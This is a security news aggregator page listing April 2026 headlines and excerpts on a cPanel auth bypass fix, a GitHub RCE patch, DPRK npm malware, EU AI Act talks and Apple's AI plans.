cPanel, WHM emergency update fixes critical auth bypass bug

Bleeping Computer - 29 Duben, 2026 - 17:51
A critical vulnerability affecting all but the latest versions of cPanel and the WebHost Manager (WHM) dashboard could be exploited to obtain access to the control panel without authentication. [...]
Kategorie: Hacking & Security

Apple will be behind on AI — until it isn’t

Computerworld.com [Hacking News] - 29 Duben, 2026 - 17:49

Apple is building new AI photo editing tools to introduce with its next major software updates this fall, and these won’t be the only AI tools and services it wants to talk about at the Worldwide Developers Conference (WWDC) in a few weeks’ time.

While it is correct to say Apple has had setbacks in AI development, it has also had successes. Was it ready for the generative AI (genAI) juggernaut? Probably not, nor has it successfully developed its own response in-house. Is Apple’s platform ready for AI? Indisputably, with the power and performance across all its hardware products to run AI on the edge, in the cloud, and as-a-service. Right now, Apple doesn’t offer the world’s best AI services, but does offer the world’s best platform on which to run them.

Given you can’t have one without the other, no matter how you slice and dice it, Apple has therefore seen partial success in AI. Now, it just needs to add the software and the services, about which we’ll find out much more in June.

What can we expect from the New Apple AI?

Apple’s AI photo editing updates will join the existing Clean Up tool and include tools that include Extend, Enhance, and Reframe:

  • Extend: Extends an image beyond the original frame using the source image as a guide, this works in a similar way to Adobe Photoshop’s Generative Expand.
  • Enhance: Scan the image and optimize it improved color, lighting, and other effects.
  • Reframe: A spatial feature that can shift the perspective of an image, so a photo of the side of someone’s head can become a portrait shot, thanks to AI.

Bloomberg tells us development of these new tools isn’t yet complete and warns they may be delayed, though that only makes it possible they will arrive later in the iOS 27 beta testing process. We know the company is working on additional tools.

We also know Apple will improve Siri and expand other Apple Intelligence features. To accomplish this, its engineers are working with Google Gemini to build dedicated large language models (LLMs) capable of running on the devices themselves, or via its own Private Cloud Compute. The company also intends to roll out a dedicated Siri app with a chat interface similar to that used by all the other genAI services, such as ChatGPT. 

The idea that Apple will turn Siri into an app implies plans to permit users to download alternative LLM-based apps to use. Apple likely recognizes it might need to provide that level of choice to avoid giving regulators yet another stick to slap it with. 

Big plans for AI services

Apple’s actions in AI show that its management believes AI services are likely to become commodities, which means they will continue to be highly reliant on the platforms where they run, which is good news for Apple’s hardware. Apple’s move to secure its processor development road map with more advanced 1.4nm and smaller chips over the coming years will only build up the company’s advantage. As Apple Senior Vice President Johny Srouji put it, the recently introduced M5 chip “ushers in the next big leap in AI performance for Apple silicon.” He means it — and when it comes to hardware, Apple knows to expect imitators.

The approach also suggests the company will offer AI services via an App Store for AI. You might purchase or subscribe to AI agents for specific tasks via a customer-focused App Store, for example. Offering these commodities via a dedicated online portal makes sense, while the company’s famed curation model means customers will be able to use those agents in relative confidence that their data isn’t being swiped in the process.

If I’m right, then the face of Apple’s so-called “AI failure” looks liked a combined hardware/software/services model in which customers have complete choice in which breeds of AI services they want to use, boosted by an App Store for useful AI services, Apple’s own Apple Intelligence tools supported by Google Gemini, all running happily on best-in-the-industry hardware with enough horsepower to handle most tasks natively.

Now, I may be an Appleholic, but I find it pretty difficult to see that connected AI ecosystem as much of a failure at all. I predict at WWDC 2026 we’re going to see the story change from one of losing the AI race to another fable of iconic AI recovery. That’s assuming, of course, the company manages to meet its own promises this time.

You can follow me on social media! Join me on BlueSky,  LinkedIn, and Mastodon.

Kategorie: Hacking & Security

New Wave of DPRK Attacks Uses AI-Inserted npm Malware, Fake Firms, and RATs

The Hacker News - 29 Duben, 2026 - 16:43
Cybersecurity researchers have discovered malicious code in an npm package after a malicious package as a dependency to the project by Anthropic's Claude Opus large language model (LLM). The package in question is "@validate-sdk/v2," which is listed on npm as a utility software development kit (SDK) for hashing, validation, encoding/decoding, and secure random generation. However, its real Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

European police dismantles €50 million crypto investment fraud ring

Bleeping Computer - 29 Duben, 2026 - 16:27
Austrian and Albanian authorities dismantled a criminal ring accused of running a large-scale cryptocurrency investment fraud operation that caused estimated losses of over €50 million ($58.5 million) to victims worldwide. [...]
Kategorie: Hacking & Security

Learning from the Vercel breach: Shadow AI & OAuth sprawl

Bleeping Computer - 29 Duben, 2026 - 15:05
A single third-party OAuth integration can become a direct path into your environment. Push explains how the Vercel breach shows a compromised OAuth app can lead to widespread impact across downstream customers. [...]
Kategorie: Hacking & Security

EU lawmakers fail to agree on watered-down AI Act, talks pushed to May

Computerworld.com [Hacking News] - 29 Duben, 2026 - 14:42

EU member states and the European Parliament failed to agree on changes that would have softened the bloc’s AI Act and pushed back its toughest enforcement deadlines.

The talks ran for about 12 hours on Tuesday and ended without an agreement, Reuters reported, citing a Cypriot official who said it had not been possible to reach a deal with Parliament. Cyprus holds the rotating presidency of the EU Council, which negotiates on behalf of member states. According to the report, the talks broke down over the insistence by some member states and lawmakers that industries already covered by sectoral safety rules be left out of the AI legislation.

Tuesday’s session was the last political trilogue on the Digital Omnibus on AI scheduled before formal adoption, according to the European Parliament’s legislative tracker. Talks will resume in May, and if no deal is reached before August 2, the AI Act’s high-risk obligations will apply that day as originally drafted.

The European Parliament’s co-rapporteurs on the file, Arba Kokalari and Michael McNamara, were scheduled to brief journalists in Strasbourg on Wednesday on the negotiations to update EU rules, but the briefing was cancelled at the last moment.

Neither of the rapporteurs’ offices immediately responded to a request for comment. The Cypriot presidency press service also did not respond by the deadline.

Why were the deadlines to be pushed back

The Digital Omnibus on AI, which the trilogue was meant to finalise, was proposed by the European Commission on November 19 last year. The Commission framed it as part of a wider effort to simplify the EU’s digital rulebook for businesses, in response to the Draghi report on EU competitiveness.

Both the Council and the Parliament had agreed before trilogue that the deadlines should be pushed back. The Council, in its March 13 negotiating mandate, proposed new dates of “2 December 2027 for stand-alone high-risk AI systems, and 2 August 2028 for high-risk AI systems embedded in products.” Parliament voted to adopt the same dates on Mar. 26 by 569 votes to 45, with 23 abstentions.

The deadlines were pushed back because the technical standards that companies need to demonstrate compliance with are not ready. Communications from CEN-CENELEC’s Joint Technical Committee 21, which is drafting the standards, suggest the full set may not be available before December 2026, according to a client note from law firm Morrison Foerster.

What Council and Parliament could not agree on was an exemption Parliament wanted for AI used in products that already fall under EU safety rules, such as machinery, toys, and medical devices, the report added.

The exemption “faced limited enthusiasm in the Council, with different compromise proposals being discussed,” the Center for Democracy and Technology Europe said in its April bulletin.

Consumer, medical, and academic groups have opposed the exemption. Forty such organisations warned in an open letter earlier this month that the proposals “still risk reopening core elements of this framework, crucially weakening the AI Act.”

For affected industries, the case for the exemption is the cumulative compliance burden, said Neil Shah, vice president for research and partner at Counterpoint Research. “In already highly regulated industries such as medical, an additional AI regulation further increases compliance and headaches for the enterprises,” he said. “Complying with both physical and digital safety is important, but there has to be a way to reduce the compliance burden and be answerable to a single regulatory authority.”

What happens next

CIOs should treat August 2 as a hard deadline regardless of what happens in May, Shah said. “I believe CIOs are in a tough spot right now. They should be prepared, irrespective of the regulatory limbo, and treat this summer as a hard deadline. If it gets delayed, then it’s a bonus and if not, then it would be a regulatory risk.”

If lawmakers fail to land a deal before August 2, the high-risk obligations apply as drafted, regardless of whether harmonised standards or national enforcement authorities are ready. Patchy readiness across member states does not reduce the risk for businesses, said Enza Iannopollo, vice president and principal analyst at Forrester.

“It’s obvious that if the authorities responsible for enforcing the rules are not in place, there won’t be enforcement, despite the deadlines,” she said. “But Member States can accelerate that process and put those authorities in place rather quickly. Some countries have already named them. The risk is that businesses lose track of developments across each Member State and find themselves exposed to regulatory scrutiny and fines.”

Other parts of the AI Act will keep moving on their original schedule. The prohibitions on unacceptable-risk AI have applied since February 2025. The general-purpose AI rules came into force in August 2025. The transparency obligations under Article 50, including disclosure for chatbot interactions and labelling of deepfakes, are set to apply from August 2.

For CIOs, Iannopollo said, the underlying compliance work continues regardless of trilogue politics. “Waiting is not an option. CIOs must start building the foundations of AI governance and compliance,” she said. “If they are not inventorying their AI use cases, assessing risks in light (also) of the EU AI Act’s risk categorisation, and defining risk management measures, they risk not only fines. They risk reputational damage and the inability to effectively scale their AI initiatives.”

The Cypriot presidency runs until June 30, after which Ireland takes over.

Kategorie: Hacking & Security

GitHub fixes RCE flaw that gave access to millions of private repos

Bleeping Computer - 29 Duben, 2026 - 14:41
In early March, GitHub patched a critical remote code execution vulnerability (CVE-2026-3854) that could have allowed attackers to access millions of private repositories. [...]
Kategorie: Hacking & Security

Webinar: How to Automate Exposure Validation to Match the Speed of AI Attacks

The Hacker News - 29 Duben, 2026 - 14:02
In February 2026, researchers uncovered a shift that completely changed the game: threat actors are now using custom AI setups to automate attacks directly into the kill chain. We aren't just talking about AI writing better phishing emails anymore. We’re talking about autonomous agents mapping Active Directory and seizing Domain Admin credentials in minutes. The problem? Most defensive [email protected]
Kategorie: Hacking & Security

Propálí svítilna na telefonech Samsung plasty? Virální videa neříkají celou pravdu

Zive.cz - bezpečnost - 29 Duben, 2026 - 13:45
** Výkonné svítilny moderních telefonů skutečně dokážou roztavit tenký tmavý plast ** Tento fyzikální jev se rozhodně netýká pouze značky mobilů Samsung ** Riziku popálení předejdete softwarovým snížením maximální intenzity světla
Kategorie: Hacking & Security

What to Look for in an Exposure Management Platform (And What Most of Them Get Wrong)

The Hacker News - 29 Duben, 2026 - 13:30
Every security team has a version of the same story. The quarter ends with hundreds of vulnerabilities closed. The dashboards are bursting with green. Then someone in a leadership meeting asks: "So, are we actually safer now?" Crickets. The room goes quiet because an honest answer requires context – which is something that patch counts and CVSS scores were never designed to provide. Exposure The Hacker Newshttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security
Syndikovat obsah